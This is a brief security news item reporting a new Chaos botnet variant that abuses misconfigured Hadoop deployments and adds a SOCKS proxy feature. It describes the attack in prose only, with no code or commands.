A new variant of the Chaos malware has been identified, capable of targeting misconfigured cloud deployments. This marks a significant expansion of the botnet’s targeting infrastructure, moving beyond its traditional focus on routers and edge devices, with further coverage provided by The Hacker News.First documented in September 2022, Chaos is a cross-platform malware that can run remote shell commands, deploy additional modules, propagate via SSH brute-forcing, mine cryptocurrency, and launch DDoS attacks. Researchers believe it is an evolution of the Kaiji malware, which targeted misconfigured Docker instances. The latest variant, identified by Darktrace, exploits misconfigured Hadoop instances through an HTTP request to create a new application. This application then retrieves a Chaos agent binary from an attacker-controlled server, sets permissions to allow execution, and runs the binary before deleting traces. The domain used in a recent attack was previously linked to a Chinese cybercrime group’s phishing campaign. The new 64-bit ELF binary has removed SSH propagation and router exploit functions, replacing them with a SOCKS proxy feature to ferry traffic and conceal malicious activity.The evolution of Chaos malware, including the addition of proxy services, indicates a shift in cybercriminal monetization strategies beyond just cryptocurrency mining and DDoS-for-hire services. This trend, also seen in botnets like AISURU, suggests that organizations face a broader range of threats from these evolving botnets.Source:The Hacker News
Get essential knowledge and practical strategies to fortify your cloud security.
